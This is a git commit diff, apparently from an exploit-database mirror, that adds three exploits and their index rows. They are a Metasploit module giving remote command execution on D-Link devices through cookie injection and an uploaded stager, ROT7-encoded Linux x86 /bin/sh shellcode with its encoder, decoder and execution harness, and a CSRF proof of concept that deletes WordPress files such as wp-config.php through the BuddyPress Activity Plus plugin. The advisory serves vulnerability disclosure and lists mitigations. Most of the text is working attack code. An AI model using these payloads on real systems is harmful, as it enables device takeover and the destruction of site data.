DB: 2015-07-18
3 new exploits
This commit is contained in:
parent
5454188b4e
commit
e4d0bdd544
4 changed files with 321 additions and 0 deletions
|
@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port
|
|||
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
|
||||
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
|
||||
37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
|
||||
37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
|
||||
37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
|
||||
37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
|
||||
37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
|
||||
|
@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port
|
|||
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
|
||||
37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
152
platforms/hardware/remote/37628.rb
Executable file
152
platforms/hardware/remote/37628.rb
Executable file
|
@ -0,0 +1,152 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'D-Link Cookie Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an anonymous remote upload and code execution vulnerability on different
|
||||
D-Link devices. The vulnerability is a command injection in the cookie handling process of the
|
||||
lighttpd web server when handling specially crafted cookie values. This module has been
|
||||
successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
|
||||
],
|
||||
'DisclosureDate' => 'Jun 12 2015',
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE
|
||||
}
|
||||
],
|
||||
[ 'MIPS Big Endian',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Trying to access the device ...")
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Uploading stager ...")
|
||||
@counter = 1
|
||||
execute_cmdstager(
|
||||
:flavor => :echo,
|
||||
:linemax => 95 # limited by our upload, larger payloads crash the web server
|
||||
)
|
||||
|
||||
print_status("#{peer} - creating payload and executing it ...")
|
||||
|
||||
(1 .. @counter).each do |act_file|
|
||||
# the http server blocks access to our files ... we copy it to a new one
|
||||
# the length of our command is restricted to 19 characters
|
||||
cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
|
||||
execute_final_command(cmd)
|
||||
cmd = "chmod +x /tmp/#{act_file+@counter}"
|
||||
execute_final_command(cmd)
|
||||
cmd = "/tmp/#{act_file+@counter}"
|
||||
execute_final_command(cmd)
|
||||
cmd = "rm /tmp/#{act_file}"
|
||||
execute_final_command(cmd)
|
||||
cmd = "rm /tmp/#{act_file+@counter}"
|
||||
execute_final_command(cmd)
|
||||
end
|
||||
end
|
||||
|
||||
def execute_command(cmd,opts)
|
||||
# upload our stager to a shell script
|
||||
# upload takes quite long because there is no response from the web server
|
||||
|
||||
file_upload = "#!/bin/sh\n"
|
||||
file_upload << cmd << "\n"
|
||||
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
|
||||
post_data.bound = "-#{rand_text_alpha(12)}--"
|
||||
file = post_data.to_s
|
||||
|
||||
@counter = @counter + 1
|
||||
|
||||
begin
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "/web_cgi.cgi",
|
||||
'vars_get' => {
|
||||
'&request' =>'UploadFile',
|
||||
'path' => '/tmp/'
|
||||
},
|
||||
'encode_params' => false,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => file
|
||||
})
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def execute_final_command(cmd)
|
||||
# very limited space - larger commands crash the webserver
|
||||
fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
|
||||
begin
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "/",
|
||||
'cookie' => "i=`#{cmd}`"
|
||||
}, 5)
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
end
|
104
platforms/lin_x86/shellcode/37495.py
Executable file
104
platforms/lin_x86/shellcode/37495.py
Executable file
|
@ -0,0 +1,104 @@
|
|||
# Shellcode Title: ROT7
|
||||
# Date: 5 July 2015
|
||||
# Exploit Author: Artem Tsvetkov
|
||||
# Software Link:
|
||||
https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7
|
||||
# Tested on: Kali GNU/Linux 1.1.0
|
||||
# Platform: x86 Linux
|
||||
|
||||
This code was created as an exercise for the SecurityTube Linux Assembly
|
||||
Expert (SLAE).
|
||||
|
||||
The following will produce rot7-encoded shellcode using a custom scheme to
|
||||
dynamically set the shellcode length. The length is used by the decoder to
|
||||
determine when it should stop decoding.
|
||||
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/python
|
||||
# Python ROT-7 Encoder
|
||||
# execve 24 bytes
|
||||
shellcode = (
|
||||
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
|
||||
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
|
||||
)
|
||||
|
||||
# byte[0] == shellcode length
|
||||
encoded = "\\x%02x," % len(bytearray(shellcode))
|
||||
encoded2 = "0x%02x," % len(bytearray(shellcode))
|
||||
|
||||
print 'Encoded shellcode ...'
|
||||
|
||||
for x in bytearray(shellcode) :
|
||||
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
|
||||
if x > 248:
|
||||
encoded += '\\x'
|
||||
encoded += '%02x' %(7 -(256 - x))
|
||||
encoded2 += '0x'
|
||||
encoded2 += '%02x,' %(7 -(256 - x))
|
||||
else:
|
||||
encoded += '\\x'
|
||||
encoded += '%02x'%(x+7)
|
||||
encoded2 += '0x'
|
||||
encoded2 += '%02x,' %(x+7)
|
||||
|
||||
print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,
|
||||
len(bytearray(shellcode)))
|
||||
|
||||
|
||||
|
||||
|
||||
The following is the NASM decoder:
|
||||
|
||||
|
||||
; ROT7 NASM decoder
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
jmp short stage
|
||||
|
||||
decoder:
|
||||
pop esi ; shellcode address
|
||||
mov al, byte [esi] ; shellcode length
|
||||
xor ecx, ecx ; position
|
||||
|
||||
decode:
|
||||
mov bl, byte [esi+ecx+1] ; get rot'ed byted
|
||||
sub bl, 0x7 ; rot it back (-7)
|
||||
mov byte [esi+ecx], bl ; store it in shellcode
|
||||
inc ecx ; next position
|
||||
cmp al, cl ; check if reached the end of shellcode
|
||||
jnz short decode ; if not, continue derot'ing
|
||||
jmp shellcode ; else, execute derot'ed shellcode
|
||||
|
||||
stage:
|
||||
call decoder
|
||||
|
||||
; Shellcode Format:
|
||||
; byte[0] = length of shellcode (max 0xff)
|
||||
; byte[1..] = rot'ed shellcode
|
||||
shellcode: db
|
||||
0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
|
||||
|
||||
|
||||
|
||||
|
||||
/*
|
||||
* Sample run
|
||||
*
|
||||
* Compile with: gcc rot7.c -o rot7
|
||||
*
|
||||
*/
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";
|
||||
|
||||
int main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
62
platforms/php/webapps/37629.txt
Executable file
62
platforms/php/webapps/37629.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
Details
|
||||
================
|
||||
Software: BuddyPress Activity Plus
|
||||
Version: 1.5
|
||||
Homepage: http://wordpress.org/plugins/buddypress-activity-plus/
|
||||
Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/
|
||||
CVE: Awaiting assignment
|
||||
CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C)
|
||||
|
||||
Description
|
||||
================
|
||||
CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5
|
||||
|
||||
Vulnerability
|
||||
================
|
||||
An attacker can delete any file the PHP process can delete.
|
||||
For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
|
||||
|
||||
Proof of concept
|
||||
================
|
||||
Ensure your PHP user can do maximum damage:
|
||||
sudo chown www-data:www-data /var/vhosts/my-wordpress-site
|
||||
Visit a page containing this as a logged-in user and click submit:
|
||||
<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
|
||||
<input type=\"text\" name=\"action\" value=\"bpfb_remove_temp_images\">
|
||||
<input type=\"text\" name=\"data\" value=\"bpfb_photos[]=../../../../wp-config.php\">
|
||||
<input type=\"submit\">
|
||||
</form>
|
||||
If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory.
|
||||
Note that you can also delete as many things as you like at once – $_POST[‘data’] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files.
|
||||
There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”.
|
||||
|
||||
Mitigations
|
||||
================
|
||||
Upgrade to version 1.6.2 or later
|
||||
If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php.
|
||||
|
||||
Disclosure policy
|
||||
================
|
||||
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
|
||||
|
||||
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
|
||||
|
||||
This vulnerability will be published if we do not receive a response to this report with 14 days.
|
||||
|
||||
Timeline
|
||||
================
|
||||
|
||||
2013-08-22: Discovered
|
||||
2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/
|
||||
2015-07-13: Requested CVE
|
||||
2015-07-13: Vendor responded
|
||||
2015-07-14: Vendor reported issue fixed
|
||||
2015-07-14: Published
|
||||
|
||||
|
||||
|
||||
Discovered by dxw:
|
||||
================
|
||||
Tom Adams
|
||||
Please visit security.dxw.com for more information.
|
||||
|
Loading…
Add table
Reference in a new issue